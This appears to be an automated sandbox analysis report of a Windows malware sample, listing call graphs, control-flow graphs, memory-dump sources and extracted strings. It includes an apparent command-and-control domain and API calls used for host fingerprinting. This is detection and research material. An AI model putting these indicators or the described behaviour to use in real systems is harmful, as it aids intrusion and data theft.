6760 b2e2ef 6768 b45f30 6761->6768 6762 b46026 6804 b41790 6762->6804 6763 b460b5 6766 b41790 2 API calls 6763->6766 6765 b46020 6765->6752 6766->6765 6768->6762 6768->6763 6768->6765 6810 b60f60 6768->6810 6770 b4619e 6769->6770 6848 b60b70 6770->6848 6772 b60f60 2 API calls 6775 b45fe0 6772->6775 6773 b46026 6778 b41790 2 API calls 6773->6778 6774 b460b5 6777 b41790 2 API calls 6774->6777 6775->6772 6775->6773 6775->6774 6776 b46020 6775->6776 6776->6754 6777->6776 6778->6774 6780 b480a0 6779->6780 6781 b47e4c 6779->6781 6788 b2e2dd 6779->6788 6789 b480d7 6779->6789 6853 b5ded0 6780->6853 6781->6780 6781->6781 6782 b60f60 2 API calls 6781->6782 6784 b60b70 LdrInitializeThunk 6781->6784 6781->6788 6781->6789 6782->6781 6784->6781 6785 b60b70 LdrInitializeThunk 6785->6789 6791 b48770 6788->6791 6789->6785 6789->6788 6790 b5df70 LdrInitializeThunk 6789->6790 6859 b60c80 6789->6859 6867 b61580 6789->6867 6790->6789 6792 b487a0 6791->6792 6793 b4882e 6792->6793 6879 b5df70 LdrInitializeThunk 6792->6879 6795 b5b7e0 RtlAllocateHeap 6793->6795 6798 b4895e 6793->6798 6796 b488b1 6795->6796 6796->6798 6880 b5df70 LdrInitializeThunk 6796->6880 6798->6758 6881 b48cb0 6799->6881 6801 b48c99 6801->6760 6802->6748 6803->6750 6805 b417a0 6804->6805 6805->6805 6806 b4183e 6805->6806 6808 b41861 6805->6808 6818 b60610 6805->6818 6806->6763 6808->6806 6822 b43d70 6808->6822 6812 b60f90 6810->6812 6811 b60fde 6813 b5b7e0 RtlAllocateHeap 6811->6813 6817 b610ae 6811->6817 6812->6811 6846 b5df70 LdrInitializeThunk 6812->6846 6815 b6101f 6813->6815 6815->6817 6847 b5df70 LdrInitializeThunk 6815->6847 6817->6768 6817->6817 6819 b60630 6818->6819 6820 b6075e 6819->6820 6834 b5df70 LdrInitializeThunk 6819->6834 6820->6808 6835 b60480 6822->6835 6824 b43db0 6829 b444c3 6824->6829 6839 b5b7e0 6824->6839 6827 b43dee 6832 b43e7c 6827->6832 6842 b5df70 LdrInitializeThunk 6827->6842 6828 b5b7e0 RtlAllocateHeap 6828->6832 6829->6806 6830 b44427 6830->6829 6844 b5df70 LdrInitializeThunk 6830->6844 6832->6828 6832->6830 6843 b5df70 LdrInitializeThunk 6832->6843 6834->6820 6836 b604a0 6835->6836 6837 b605be 6836->6837 6845 b5df70 LdrInitializeThunk 6836->6845 6837->6824 6840 b5b800 6839->6840 6840->6840 6841 b5b83f RtlAllocateHeap 6840->6841 6841->6827 6842->6827 6843->6832 6844->6830 6845->6837 6846->6811 6847->6817 6849 b60b90 6848->6849 6851 b60c4f 6849->6851 6852 b5df70 LdrInitializeThunk 6849->6852 6851->6775 6852->6851 6854 b5df3e 6853->6854 6855 b5df44 6853->6855 6856 b5deea 6853->6856 6857 b5b7e0 RtlAllocateHeap 6854->6857 6855->6789 6856->6855 6858 b5df29 RtlReAllocateHeap 6856->6858 6857->6855 6858->6855 6860 b60cb0 6859->6860 6861 b60cfe 6860->6861 6875 b5df70 LdrInitializeThunk 6860->6875 6863 b5b7e0 RtlAllocateHeap 6861->6863 6866 b60e0f 6861->6866 6864 b60d8b 6863->6864 6864->6866 6876 b5df70 LdrInitializeThunk 6864->6876 6866->6789 6866->6866 6868 b61591 6867->6868 6869 b6163e 6868->6869 6877 b5df70 LdrInitializeThunk 6868->6877 6871 b5b7e0 RtlAllocateHeap 6869->6871 6874 b617de 6869->6874 6872 b616ae 6871->6872 6872->6872 6872->6874 6878 b5df70 LdrInitializeThunk 6872->6878 6874->6789 6875->6861 6876->6866 6877->6869 6878->6874 6879->6793 6880->6798 6882 b48d10 6881->6882 6882->6882 6891 b5b8e0 6882->6891 6884 b48d6d 6884->6801 6886 b48d45 6886->6884 6889 b48e66 6886->6889 6899 b5bb20 6886->6899 6903 b5c040 6886->6903 6890 b48ece 6889->6890 6911 b5bfa0 6889->6911 6890->6801 6892 b5b900 6891->6892 6893 b5b93e 6892->6893 6915 b5df70 LdrInitializeThunk 6892->6915 6894 b5b7e0 RtlAllocateHeap 6893->6894 6898 b5ba1f 6893->6898 6896 b5b9c5 6894->6896 6896->6898 6916 b5df70 LdrInitializeThunk 6896->6916 6898->6886 6900 b5bbce 6899->6900 6901 b5bb31 6899->6901 6900->6886 6901->6900 6917 b5df70 LdrInitializeThunk 6901->6917 6905 b5c090 6903->6905 6904 b5c0d8 6906 b5c73e 6904->6906 6908 b5c6cf 6904->6908 6910 b5df70 LdrInitializeThunk 6904->6910 6905->6904 6918 b5df70 LdrInitializeThunk 6905->6918 6906->6886 6908->6906 6919 b5df70 LdrInitializeThunk 6908->6919 6910->6904 6913 b5bfc0 6911->6913 6912 b5c00e 6912->6889 6913->6912 6920 b5df70 LdrInitializeThunk 6913->6920 6915->6893 6916->6898 6917->6900 6918->6904 6919->6906 6920->6912 6921 b289a0 6925 b289af 6921->6925 6922 b28cb3 ExitProcess 6923 b28cae 6930 b5deb0 6923->6930 6925->6922 6925->6923 6929 b2ce80 CoInitializeEx 6925->6929 6933 b5f460 6930->6933 6932 b5deb5 FreeLibrary 6932->6922 6934 b5f469 6933->6934 6934->6932 7020 b2a2e1 7021 b2a3d0 7020->7021 7021->7021 7024 b2b210 7021->7024 7026 b2b2a0 7024->7026 7025 b5ded0 RtlAllocateHeap RtlReAllocateHeap 7025->7026 7026->7025 7027 b2a3fe 7026->7027 6940 b41960 6941 b419d8 6940->6941 6946 b39530 6941->6946 6943 b41a84 6944 b39530 LdrInitializeThunk 6943->6944 6945 b41b29 6944->6945 6947 b39560 6946->6947 6948 b60480 LdrInitializeThunk 6947->6948 6951 b3962e 6948->6951 6949 b3974b 6964 b607b0 6949->6964 6950 b39756 6955 b39783 6950->6955 6957 b396ca 6950->6957 6958 b60880 6950->6958 6951->6949 6951->6950 6952 b60480 LdrInitializeThunk 6951->6952 6951->6955 6951->6957 6952->6951 6955->6957 6968 b5df70 LdrInitializeThunk 6955->6968 6957->6943 6957->6957 6960 b608b0 6958->6960 6959 b609ae 6959->6955 6962 b608fe 6960->6962 6969 b5df70 LdrInitializeThunk 6960->6969 6962->6959 6970 b5df70 LdrInitializeThunk 6962->6970 6966 b607e0 6964->6966 6965 b6082e 6965->6950 6966->6965 6971 b5df70 LdrInitializeThunk 6966->6971 6968->6957 6969->6962 6970->6959 6971->6965 6996 b5bce0 6997 b5bd5a 6996->6997 6998 b5bcf2 6996->6998 6998->6997 6999 b5bd52 6998->6999 7004 b5df70 LdrInitializeThunk 6998->7004 6999->6999 7001 b5bede 6999->7001 7005 b5df70 LdrInitializeThunk 6999->7005 7001->6997 7006 b5df70 LdrInitializeThunk 7001->7006 7004->6999 7005->7001 7006->6997 7028 b602c0 7030 b602e0 7028->7030 7029 b6041e 7030->7029 7032 b5df70 LdrInitializeThunk 7030->7032 7032->7029 7038 b60a00 7040 b60a30 7038->7040 7039 b60b2e 7042 b60a7e 7040->7042 7044 b5df70 LdrInitializeThunk 7040->7044 7042->7039 7045 b5df70 LdrInitializeThunk 7042->7045 7044->7042 7045->7039 6972 b2cf05 6973 b2cf20 6972->6973 6978 b59030 6973->6978 6975 b2cf7a 6976 b59030 5 API calls 6975->6976 6977 b2d3ca 6976->6977 6977->6977 6979 b59090 6978->6979 6980 b591b1 SysAllocString 6979->6980 6983 b5966a 6979->6983 6982 b591df 6980->6982 6981 b5969c GetVolumeInformationW 6986 b596ba 6981->6986 6982->6983 6984 b591ea CoSetProxyBlanket 6982->6984 6983->6981 6984->6983 6987 b5920a 6984->6987 6985 b59658 SysFreeString SysFreeString 6985->6983 6986->6975 6987->6985 7050 b2c32b 7051 b5ded0 2 API calls 7050->7051 7052 b2c338 7051->7052 6988 b2e88f 6989 b2e88e 6988->6989 6989->6988 6991 b2e89c 6989->6991 6994 b5df70 LdrInitializeThunk 6989->6994 6993 b2e948 6991->6993 6995 b5df70 LdrInitializeThunk 6991->6995 6994->6991 6995->6993

                                                                                              Executed Functions

                                                                                              Function 00B43D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 b43d70-b43db5 call b60480 3 b4451a-b4452a 0->3 4 b43dbb-b43e24 call b39500 call b5b7e0 0->4 9 b43e29-b43e37 4->9 9->9 10 b43e39 9->10 11 b43e3b-b43e3e 10->11 12 b43e66-b43e6d 11->12 13 b43e40-b43e64 11->13 14 b43e6f-b43e7a 12->14 13->11 15 b43e81-b43e98 14->15 16 b43e7c 14->16 18 b43e9f-b43eaa 15->18 19 b43e9a-b43f28 15->19 17 b43f3b-b43f3e 16->17 20 b43f40 17->20 21 b43f42-b43f47 17->21 23 b43eac-b43f1c call b5df70 18->23 24 b43f2a-b43f2f 18->24 19->24 20->21 27 b43f4d-b43f5d 21->27 28 b4442b-b44470 call b5b860 21->28 30 b43f21-b43f26 23->30 25 b43f31 24->25 26 b43f33-b43f36 24->26 25->17 26->14 32 b43f5f-b43f7c 27->32 36 b44475-b44483 28->36 30->24 34 b44134 32->34 35 b43f82-b43fa1 32->35 37 b44138-b4413b 34->37 38 b43fa3-b43fa6 35->38 36->36 39 b44485 36->39 40 b44143-b44154 call b5b7e0 37->40 41 b4413d-b44141 37->41 42 b43fbf-b43fdd call b44530 38->42 43 b43fa8-b43fbd 38->43 44 b44487-b4448a 39->44 56 b44166-b44168 40->56 57 b44156-b44161 40->57 45 b4416a-b4416c 41->45 42->34 54 b43fe3-b4401e 42->54 43->38 48 b444b2-b444b9 44->48 49 b4448c-b444b0 44->49 51 b44404-b44409 45->51 52 b44172-b44191 45->52 55 b444bb-b444c1 48->55 49->44 58 b44415-b44419 51->58 59 b4440b-b44413 51->59 60 b44196-b441a1 52->60 61 b44023-b44031 54->61 62 b444c5-b444d9 55->62 63 b444c3 55->63 56->45 64 b4441d-b44421 57->64 65 b4441b 58->65 59->65 60->60 66 b441a3-b441ab 60->66 61->61 69 b44033-b44037 61->69 70 b444dd-b444e3 62->70 71 b444db 62->71 63->3 64->32 67 b44427-b44429 64->67 65->64 68 b441ad-b441b0 66->68 67->28 73 b441e2-b44217 68->73 74 b441b2-b441e0 68->74 75 b44039-b4403c 69->75 76 b4450a-b4450d 70->76 77 b444e5-b44505 call b5df70 70->77 71->76 81 b4421c-b44227 73->81 74->68 82 b44064-b44082 call b44530 75->82 83 b4403e-b44062 75->83 79 b44513-b44518 76->79 80 b4450f-b44511 76->80 77->76 79->55 80->3 81->81 84 b44229-b4422b 81->84 90 b44084-b44088 82->90 91 b4408d-b440ad 82->91 83->75 86 b4422f-b44232 84->86 88 b44254-b44258 86->88 89 b44234-b44252 86->89 92 b4425a-b44265 88->92 89->86 90->37 93 b440b1-b44132 call b282b0 call b39160 call b282c0 91->93 94 b440af 91->94 95 b44267 92->95 96 b4426c-b44283 92->96 93->37 94->93 98 b44334-b44337 95->98 99 b44285-b44321 96->99 100 b4428a-b44295 96->100 102 b44339 98->102 103 b4433b-b4435c 98->103 105 b44323-b44328 99->105 100->105 106 b4429b-b44315 call b5df70 100->106 102->103 113 b44361-b4436c 103->113 108 b4432c-b4432f 105->108 109 b4432a 105->109 114 b4431a-b4431f 106->114 108->92 109->98 113->113 116 b4436e 113->116 114->105 118 b44370-b44373 116->118 120 b44375-b44397 118->120 121 b44399-b4439f 118->121 120->118 122 b443d5-b443d8 121->122 123 b443a1-b443a5 121->123 124 b443ed-b443f3 122->124 125 b443da-b443e1 call b5b860 122->125 126 b443a7-b443ae 123->126 128 b443f5-b443f8 124->128 133 b443e6-b443eb 125->133 129 b443b0-b443bc 126->129 130 b443be-b443c7 126->130 128->51 134 b443fa-b44402 128->134 129->126 131 b443c9 130->131 132 b443cb 130->132 135 b443d1-b443d3 131->135 132->135 133->128 134->64 135->122
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                                                                              • API String ID: 1279760036-1524723224
                                                                                              • Opcode ID: 42b607f2c214bd513ad33e7fa0ed5145801873033ec57f71631f32264877dfcc
                                                                                              • Instruction ID: 0ce0b393337d8200d628b038cffc52dfefbeb90cb8982ff4f2e6490fe8666cb4
                                                                                              • Opcode Fuzzy Hash: 42b607f2c214bd513ad33e7fa0ed5145801873033ec57f71631f32264877dfcc
                                                                                              • Instruction Fuzzy Hash: 6622BDB150C3808FD3208F28C4943AFBBE1EB95314F1849ADE5D987392D7B68A49DB53
                                                                                              Function 00B59030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 136 b59030-b59089 137 b59090-b590c6 136->137 137->137 138 b590c8-b590e4 137->138 140 b590e6 138->140 141 b590f1-b5913f 138->141 140->141 143 b59145-b59177 141->143 144 b5968c-b596b8 call b5f9a0 GetVolumeInformationW 141->144 145 b59180-b591af 143->145 149 b596bc-b596df call b40650 144->149 150 b596ba 144->150 145->145 147 b591b1-b591e4 SysAllocString 145->147 154 b59674-b59688 147->154 155 b591ea-b59204 CoSetProxyBlanket 147->155 156 b596e0-b596e8 149->156 150->149 154->144 157 b5966a-b59670 155->157 158 b5920a-b59225 155->158 156->156 159 b596ea-b596ec 156->159 157->154 161 b59230-b59262 158->161 162 b596fe-b5972d call b40650 159->162 163 b596ee-b596fb call b28330 159->163 161->161 164 b59264-b592df 161->164 172 b59730-b59738 162->172 163->162 171 b592e0-b5930b 164->171 171->171 173 b5930d-b5933d 171->173 172->172 174 b5973a-b5973c 172->174 185 b59343-b59365 173->185 186 b59658-b59668 SysFreeString * 2 173->186 175 b5974e-b5977d call b40650 174->175 176 b5973e-b5974b call b28330 174->176 182 b59780-b59788 175->182 176->175 182->182 184 b5978a-b5978c 182->184 187 b5979e-b597cb call b40650 184->187 188 b5978e-b5979b call b28330 184->188 193 b5964b-b59655 185->193 194 b5936b-b5936e 185->194 186->157 197 b597d0-b597d8 187->197 188->187 193->186 194->193 196 b59374-b59379 194->196 196->193 199 b5937f-b593cf 196->199 197->197 200 b597da-b597dc 197->200 206 b593d0-b59416 199->206 201 b597ee-b597f5 200->201 202 b597de-b597eb call b28330 200->202 202->201 206->206 207 b59418-b5942d 206->207 208 b59431-b59433 207->208 209 b59636-b59647 208->209 210 b59439-b5943f 208->210 209->193 210->209 211 b59445-b59452 210->211 212 b59454-b59459 211->212 213 b5948d 211->213 215 b5946c-b59470 212->215 216 b5948f-b594b7 call b282b0 213->216 218 b59460 215->218 219 b59472-b5947b 215->219 225 b594bd-b594cb 216->225 226 b595e8-b595f9 216->226 222 b59461-b5946a 218->222 223 b59482-b59486 219->223 224 b5947d-b59480 219->224 222->215 222->216 223->222 227 b59488-b5948b 223->227 224->222 225->226 228 b594d1-b594d5 225->228 229 b59600-b5960c 226->229 230 b595fb 226->230 227->222 231 b594e0-b594ea 228->231 232 b59613-b59633 call b282e0 call b282c0 229->232 233 b5960e 229->233 230->229 234 b59500-b59506 231->234 235 b594ec-b594f1 231->235 232->209 233->232 238 b59525-b59533 234->238 239 b59508-b5950b 234->239 237 b59590-b59596 235->237 245 b59598-b5959e 237->245 242 b59535-b59538 238->242 243 b595aa-b595b3 238->243 239->238 241 b5950d-b59523 239->241 241->237 242->243 248 b5953a-b59581 242->248 246 b595b5-b595b7 243->246 247 b595b9-b595bc 243->247 245->226 250 b595a0-b595a2 245->250 246->245 251 b595e4-b595e6 247->251 252 b595be-b595e2 247->252 248->237 250->231 253 b595a8 250->253 251->237 252->237 253->226
                                                                                              APIs
                                                                                              • SysAllocString.OLEAUT32(13C511C2), ref: 00B591B7
                                                                                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00B591FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocBlanketProxyString
                                                                                              • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                                                                              • API String ID: 900851650-4011188741
                                                                                              • Opcode ID: 0e2ef54ce1ede50014b0167b952d1c75b68a0556c0a0b15b0148284ccf028743
                                                                                              • Instruction ID: 11bd837c98ec19b8d813faf61ee0a00a01d61a97c9aef93b3273f132938e51e5
                                                                                              • Opcode Fuzzy Hash: 0e2ef54ce1ede50014b0167b952d1c75b68a0556c0a0b15b0148284ccf028743
                                                                                              • Instruction Fuzzy Hash: 592242719083109FE724CF20CC81B6BBBE6EF95314F148A9CF9959B281E774D909CB92
                                                                                              Function 00B2CF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 254 b2cf05-b2cf12 255 b2cf20-b2cf5c 254->255 255->255 256 b2cf5e-b2cfa5 call b28930 call b59030 255->256 261 b2cfb0-b2cffc 256->261 261->261 262 b2cffe-b2d06b 261->262 263 b2d070-b2d097 262->263 263->263 264 b2d099-b2d0aa 263->264 265 b2d0cb-b2d0d3 264->265 266 b2d0ac-b2d0b3 264->266 268 b2d0d5-b2d0d6 265->268 269 b2d0eb-b2d0f8 265->269 267 b2d0c0-b2d0c9 266->267 267->265 267->267 270 b2d0e0-b2d0e9 268->270 271 b2d0fa-b2d101 269->271 272 b2d11b-b2d123 269->272 270->269 270->270 273 b2d110-b2d119 271->273 274 b2d125-b2d126 272->274 275 b2d13b-b2d266 272->275 273->272 273->273 276 b2d130-b2d139 274->276 277 b2d270-b2d2ce 275->277 276->275 276->276 277->277 278 b2d2d0-b2d2ff 277->278 279 b2d300-b2d31a 278->279 279->279 280 b2d31c-b2d36b call b2b960 279->280 283 b2d370-b2d3ac 280->283 283->283 284 b2d3ae-b2d3c5 call b28930 call b59030 283->284 288 b2d3ca-b2d3eb 284->288 289 b2d3f0-b2d43c 288->289 289->289 290 b2d43e-b2d4ab 289->290 291 b2d4b0-b2d4d7 290->291 291->291 292 b2d4d9-b2d4ea 291->292 293 b2d4fb-b2d503 292->293 294 b2d4ec-b2d4ef 292->294 296 b2d505-b2d506 293->296 297 b2d51b-b2d528 293->297 295 b2d4f0-b2d4f9 294->295 295->293 295->295 298 b2d510-b2d519 296->298 299 b2d52a-b2d531 297->299 300 b2d54b-b2d557 297->300 298->297 298->298 303 b2d540-b2d549 299->303 301 b2d56b-b2d696 300->301 302 b2d559-b2d55a 300->302 305 b2d6a0-b2d6fe 301->305 304 b2d560-b2d569 302->304 303->300 303->303 304->301 304->304 305->305 306 b2d700-b2d72f 305->306 307 b2d730-b2d74a 306->307 307->307 308 b2d74c-b2d791 call b2b960 307->308
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ()$+S7U$,_"Q$0C%E$6AF2E8679F70768FD7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                                                                                              • API String ID: 0-3283042903
                                                                                              • Opcode ID: 5e29a9db8339656793c43bb936f67ff4629973a2866d28633deb8555f72be58b
                                                                                              • Instruction ID: f7f2ada1c1de89532fb84fcd5961999b1bc6e4b1cf24d945472882c4c575cf5c
                                                                                              • Opcode Fuzzy Hash: 5e29a9db8339656793c43bb936f67ff4629973a2866d28633deb8555f72be58b
                                                                                              • Instruction Fuzzy Hash: 48120CB15483D18ED3348F25D495BEFBBE1EBE2304F28899CC4DA5B256C774094ACB92
                                                                                              Function 00B298F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 311 b298f0-b298fe 312 b29904-b2997f call b261a0 call b282b0 311->312 313 b29e75 311->313 319 b29980-b299b5 312->319 314 b29e77-b29e83 313->314 319->319 320 b299b7-b299df call b29210 319->320 323 b299e0-b29a5b 320->323 323->323 324 b29a5d-b29a99 call b29210 323->324 327 b29aa0-b29ae1 324->327 327->327 328 b29ae3-b29b2f call b29210 327->328 331 b29b30-b29b56 328->331 331->331 332 b29b58-b29b6f 331->332 333 b29b70-b29bdc 332->333 333->333 334 b29bde-b29c0e call b29210 333->334 337 b29c10-b29c6e 334->337 337->337 338 b29c70-b29d4b call b294d0 337->338 341 b29d50-b29d7e 338->341 341->341 342 b29d80-b29d88 341->342 343 b29db1-b29dbc 342->343 344 b29d8a-b29d92 342->344 346 b29de1-b29e0b 343->346 347 b29dbe-b29dc1 343->347 345 b29da0-b29daf 344->345 345->343 345->345 349 b29e10-b29e36 346->349 348 b29dd0-b29ddf 347->348 348->346 348->348 349->349 350 b29e38-b29e58 call b2c570 call b282c0 349->350 354 b29e5d-b29e73 350->354 354->314
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6AF2E8679F70768FD7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                                              • API String ID: 0-2269326073
                                                                                              • Opcode ID: 63b22723a28a8e5deffd9555fb2c4990b0fb5d4274bc25dc3357b2471ca9d2d2
                                                                                              • Instruction ID: dc49f0b6703b214df3fbf88ebb92f06ab57da86213a665907c89c1489c1b1d8e
                                                                                              • Opcode Fuzzy Hash: 63b22723a28a8e5deffd9555fb2c4990b0fb5d4274bc25dc3357b2471ca9d2d2
                                                                                              • Instruction Fuzzy Hash: 44E16D72A483508BD328CF35D85136BBBE2EBD5314F198A6DE5E58B395DB38C805CB42
                                                                                              Function 00B2E35B Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 295COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
